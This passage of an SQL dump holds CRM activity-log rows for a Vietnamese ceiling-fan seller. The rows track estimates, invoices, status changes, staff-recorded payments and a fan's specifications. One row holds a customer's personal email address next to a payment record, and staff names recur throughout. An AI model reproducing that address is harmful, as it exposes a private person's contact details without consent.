(665, 'invoice', 118, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-06-25 17:00:16'),
(666, 'invoice', 118, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"4.725.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/110\" target=\"_blank\">#110</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-06-25 17:00:16'),
(667, 'estimate', 77, 'estimate_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-06-27 10:13:10'),
(668, 'invoice', 119, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-06-27 10:13:21'),
(669, 'estimate', 77, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/119\">INV-DRAFT</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-06-27 10:13:21'),
(670, 'invoice', 119, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-06-27 10:36:02'),
(671, 'invoice', 119, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"6.890.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/111\" target=\"_blank\">#111</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-06-27 10:36:02'),
(672, 'estimate', 78, 'estimate_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-06-27 10:40:35'),
(673, 'invoice', 120, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-06-27 10:40:41'),
(674, 'estimate', 78, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/120\">INV-DRAFT</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-06-27 10:40:42'),
(675, 'invoice', 120, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-06-27 15:29:21'),
(676, 'invoice', 120, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"7.200.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/112\" target=\"_blank\">#112</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-06-27 15:29:21'),
(677, 'invoice', 112, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-06-29 09:01:17'),
(678, 'invoice', 112, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:10:\"500.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/113\" target=\"_blank\">#113</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-06-29 09:01:17'),
(679, 'invoice', 110, 'invoice_activity_marked_as_cancelled', '', '6', 'Mỹ Anh Nguyễn', '2022-06-29 09:02:00'),
(680, 'invoice', 95, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-06-29 09:03:01'),
(681, 'invoice', 95, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"2.800.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/114\" target=\"_blank\">#114</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-06-29 09:03:01'),
(682, 'invoice', 120, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-06-29 14:06:26'),
(683, 'invoice', 120, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"7.000.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/115\" target=\"_blank\">#115</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-06-29 14:06:26'),
(684, 'invoice', 92, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '[CRON]', '[CRON]', '2022-06-30 19:01:26'),
(685, 'invoice', 121, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-07-01 11:43:27'),
(686, 'invoice', 121, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-07-01 15:19:06'),
(687, 'invoice', 121, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"7.100.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/116\" target=\"_blank\">#116</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-07-01 15:19:06'),
(688, 'invoice', 122, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-07-02 09:14:32'),
(689, 'estimate', 72, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-07-02 09:22:29'),
(690, 'invoice', 123, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-07-02 09:22:43'),
(691, 'estimate', 72, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/123\">INV-DRAFT</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-07-02 09:22:43'),
(692, 'invoice', 123, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-07-02 09:23:22'),
(693, 'invoice', 123, 'invoice_activity_marked_as_sent', 'a:0:{}', '6', 'Mỹ Anh Nguyễn', '2022-07-02 09:23:22'),
(694, 'invoice', 123, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:60:\"Nhân công lắp đặt trần thạch cao (đã bao gồm)\";}', '6', 'Mỹ Anh Nguyễn', '2022-07-05 11:22:04'),
(695, 'invoice', 123, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '6', 'Mỹ Anh Nguyễn', '2022-07-05 11:22:04'),
(696, 'invoice', 123, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-07-07 08:31:21'),
(697, 'invoice', 123, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"5.200.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/117\" target=\"_blank\">#117</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-07-07 08:31:21'),
(698, 'invoice', 124, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-07-12 08:27:43'),
(699, 'invoice', 124, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '1', 'Ho Gia Phat', '2022-07-12 08:33:10'),
(700, 'invoice', 124, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"22.419.900 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/118\" target=\"_blank\">#118</a>\";}', '1', 'Ho Gia Phat', '2022-07-12 08:33:10'),
(701, 'invoice', 117, 'invoice_estimate_activity_updated_qty_item', 'a:3:{i:0;s:50:\"Bộ điều khiển DC 5 tốc độ Tổ chức đào tạo WIT\";i:1;s:4:\"2.00\";i:2;s:4:\"3.00\";}', '6', 'Mỹ Anh Nguyễn', '2022-07-12 11:40:15'),
(702, 'estimate', 79, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-07-12 16:44:25'),
(703, 'estimate', 80, 'estimate_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-07-13 14:22:35'),
(704, 'invoice', 125, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-07-13 14:24:10'),
(705, 'estimate', 80, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/125\">INV-DRAFT</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-07-13 14:24:10'),
(706, 'invoice', 125, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-07-14 13:42:09'),
(707, 'invoice', 125, 'invoice_activity_marked_as_sent', 'a:0:{}', '6', 'Mỹ Anh Nguyễn', '2022-07-14 13:42:09'),
(708, 'invoice', 125, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-07-14 13:42:32'),
(709, 'invoice', 125, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"2.000.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/119\" target=\"_blank\">#119</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-07-14 13:42:32'),
(710, 'invoice', 125, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-07-18 09:40:38'),
(711, 'invoice', 125, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"3.375.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/120\" target=\"_blank\">#120</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-07-18 09:40:38'),
(712, 'invoice', 126, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-07-18 09:45:04'),
(713, 'invoice', 126, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-07-18 09:45:39'),
(714, 'invoice', 126, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:10:\"600.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/121\" target=\"_blank\">#121</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-07-18 09:45:39'),
(715, 'invoice', 111, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '[CRON]', '[CRON]', '2022-07-19 08:35:28'),
(716, 'invoice', 122, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-07-19 08:37:19'),
(717, 'invoice', 122, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"6.842.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/122\" target=\"_blank\">#122</a>\";}', '1', 'Ho Gia Phat', '2022-07-19 08:37:19'),
(718, 'invoice', 127, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-07-19 18:34:49'),
(719, 'invoice', 127, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-07-19 18:39:28'),
(720, 'invoice', 127, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"5.225.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/123\" target=\"_blank\">#123</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-07-19 18:39:28'),
(721, 'invoice', 128, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-07-21 16:08:21'),
(722, 'invoice', 128, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-07-22 11:54:04'),
(723, 'invoice', 128, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"10.460.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/124\" target=\"_blank\">#124</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-07-22 11:54:04'),
(724, 'estimate', 81, 'estimate_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-07-22 17:46:57'),
(725, 'invoice', 129, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-07-22 17:47:22'),
(726, 'estimate', 81, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/129\">INV-125-22</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-07-22 17:47:22'),
(727, 'estimate', 82, 'estimate_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-07-23 10:02:19'),
(728, 'invoice', 130, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-07-23 10:03:08'),
(729, 'estimate', 82, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/130\">INV-126-22</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-07-23 10:03:08'),
(730, 'invoice', 131, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-07-23 10:22:57'),
(731, 'invoice', 131, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-07-23 10:24:13'),
(732, 'invoice', 131, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"2.857.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/125\" target=\"_blank\">#125</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-07-23 10:24:13'),
(733, 'invoice', 130, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:0:\"\";i:1;s:19:\"Bán lẻ Remote DC\";}', '6', 'Mỹ Anh Nguyễn', '2022-07-23 16:10:44'),
(734, 'invoice', 130, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:9:\"750000.00\";i:1;s:6:\"300000\";}', '6', 'Mỹ Anh Nguyễn', '2022-07-23 16:10:44'),
(735, 'invoice', 130, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:19:\"Bán lẻ Remote DC\";i:1;s:0:\"\";}', '6', 'Mỹ Anh Nguyễn', '2022-07-23 16:11:36'),
(736, 'invoice', 130, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:9:\"300000.00\";i:1;s:6:\"750000\";}', '6', 'Mỹ Anh Nguyễn', '2022-07-23 16:11:36'),
(737, 'invoice', 130, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-07-23 16:11:45'),
(738, 'invoice', 130, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:10:\"900.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/126\" target=\"_blank\">#126</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-07-23 16:11:45'),
(739, 'invoice', 129, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:0:\"\";i:1;s:19:\"Bán lẻ Remote DC\";}', '6', 'Mỹ Anh Nguyễn', '2022-07-23 16:13:14'),
(740, 'invoice', 129, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:9:\"750000.00\";i:1;s:6:\"300000\";}', '6', 'Mỹ Anh Nguyễn', '2022-07-23 16:13:14'),
(741, 'invoice', 129, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:48:\"Bảo dưỡng, sửa chữa lắp đặt quạt\";}', '6', 'Mỹ Anh Nguyễn', '2022-07-23 16:15:08'),
(742, 'invoice', 132, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-07-26 12:08:34'),
(743, 'invoice', 132, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-07-26 12:10:13'),
(744, 'invoice', 132, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"5.075.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/127\" target=\"_blank\">#127</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-07-26 12:10:13'),
(745, 'invoice', 133, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-07-26 12:11:55'),
(746, 'invoice', 133, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-07-26 12:12:07'),
(747, 'invoice', 133, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"2.000.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/128\" target=\"_blank\">#128</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-07-26 12:12:07'),
(748, 'invoice', 132, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>2</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '1', 'Ho Gia Phat', '2022-07-26 12:32:47'),
(749, 'invoice', 132, 'invoice_activity_payment_deleted', 'a:2:{i:0;s:3:\"127\";i:1;s:12:\"5.075.000 đ\";}', '1', 'Ho Gia Phat', '2022-07-26 12:32:47'),
(750, 'invoice', 132, 'invoice_activity_marked_as_cancelled', '', '6', 'Mỹ Anh Nguyễn', '2022-07-26 13:47:33'),
(751, 'invoice', 129, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-07-26 13:48:50'),
(752, 'invoice', 129, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:10:\"300.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/129\" target=\"_blank\">#129</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-07-26 13:48:50'),
(753, 'invoice', 134, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-07-27 15:23:50'),
(754, 'invoice', 134, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-07-27 15:32:55'),
(755, 'invoice', 134, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"6.160.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/130\" target=\"_blank\">#130</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-07-27 15:32:55'),
(756, 'invoice', 133, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-07-29 14:15:52'),
(757, 'invoice', 133, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"3.075.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/131\" target=\"_blank\">#131</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-07-29 14:15:52'),
(758, 'estimate', 83, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-07-29 21:44:57'),
(759, 'estimate', 83, 'invoice_estimate_activity_updated_qty_item', 'a:3:{i:0;s:49:\"Quạt trần 3 cánh gỗ PEARL 60 BN Maple Wood\";i:1;s:4:\"2.00\";i:2;s:1:\"1\";}', '1', 'Ho Gia Phat', '2022-07-30 13:28:43'),
(760, 'estimate', 83, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '1', 'Ho Gia Phat', '2022-07-30 13:28:43'),
(761, 'invoice', 135, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-07-30 13:30:33'),
(762, 'estimate', 83, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/135\">INV-131-22</a>\";}', '1', 'Ho Gia Phat', '2022-07-30 13:30:33'),
(763, 'invoice', 135, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '1', 'Ho Gia Phat', '2022-07-30 13:31:19'),
(764, 'invoice', 135, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"3.800.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/132\" target=\"_blank\">#132</a>\";}', '1', 'Ho Gia Phat', '2022-07-30 13:31:19'),
(765, 'invoice', 135, 'invoice_activity_record_payment_email_to_customer', 'a:1:{i:0;s:18:\"omanizen@gmail.com\";}', '1', 'Ho Gia Phat', '2022-07-30 13:31:25'),
(766, 'invoice', 136, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-08-01 10:16:00'),
(767, 'invoice', 136, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-01 10:19:55'),
(768, 'invoice', 136, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"4.290.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/133\" target=\"_blank\">#133</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-01 10:19:55'),
(769, 'invoice', 137, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-08-01 11:10:38'),
(770, 'invoice', 138, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-08-01 13:56:02'),
(771, 'estimate', 84, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-08-02 09:11:03'),
(772, 'invoice', 139, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-08-02 09:11:11'),
(773, 'estimate', 84, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/139\">INV-DRAFT</a>\";}', '1', 'Ho Gia Phat', '2022-08-02 09:11:11'),
(774, 'invoice', 139, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-08-02 09:11:49'),
(775, 'invoice', 139, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"21.230.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/134\" target=\"_blank\">#134</a>\";}', '1', 'Ho Gia Phat', '2022-08-02 09:11:49'),
(776, 'invoice', 138, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-02 09:29:00'),
(777, 'invoice', 138, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"3.250.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/135\" target=\"_blank\">#135</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-02 09:29:00'),
(778, 'invoice', 140, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-08-02 09:52:58'),
(779, 'invoice', 141, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-08-02 10:11:41'),
(780, 'invoice', 142, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-08-02 10:15:53'),
(781, 'invoice', 143, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-08-02 10:19:30'),
(782, 'invoice', 142, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:794:\"Model: DCF-FS52930-60 <br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm \";i:1;s:715:\"Model: DCF-FS52930-60 \r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. \r\nBlades (Số cánh): 3 pcs \r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) \r\nDiameter (Sải cánh):  1.5 mét (60 inch)  \r\nWeight * (Trọng lượng): 6.3 kg \r\nSpeed (tốc độ quay): 197 RPM (speed at max) \r\nWatts (công suất):  38 W (max) \r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) \r\nPower input (nguồn điện): 220-240 VAC \r\nEnvironment (môi trường sử dụng): trong nhà (indoor) \r\nWarranty (Bảo hành): 05 năm \r\nThương hiệu: Tổ chức đào tạo WIT - Made in China \r\nBộ điều khiển từ xa RF đi kèm\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-02 10:32:08'),
(783, 'invoice', 142, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-02 10:33:13'),
(784, 'invoice', 142, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"74.760.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/136\" target=\"_blank\">#136</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-02 10:33:13'),
(785, 'invoice', 143, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-02 10:35:57'),
(786, 'invoice', 143, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"54.120.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/137\" target=\"_blank\">#137</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-02 10:35:57'),
(787, 'invoice', 140, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-02 10:40:30'),
(788, 'invoice', 140, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:14:\"218.165.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/138\" target=\"_blank\">#138</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-02 10:40:30'),
(789, 'invoice', 140, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"64.245.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/139\" target=\"_blank\">#139</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-08-02 10:41:35'),
(790, 'invoice', 141, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:794:\"Model: DCF-FS52930-60 <br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm \";i:1;s:715:\"Model: DCF-FS52930-60 \r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. \r\nBlades (Số cánh): 3 pcs \r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) \r\nDiameter (Sải cánh):  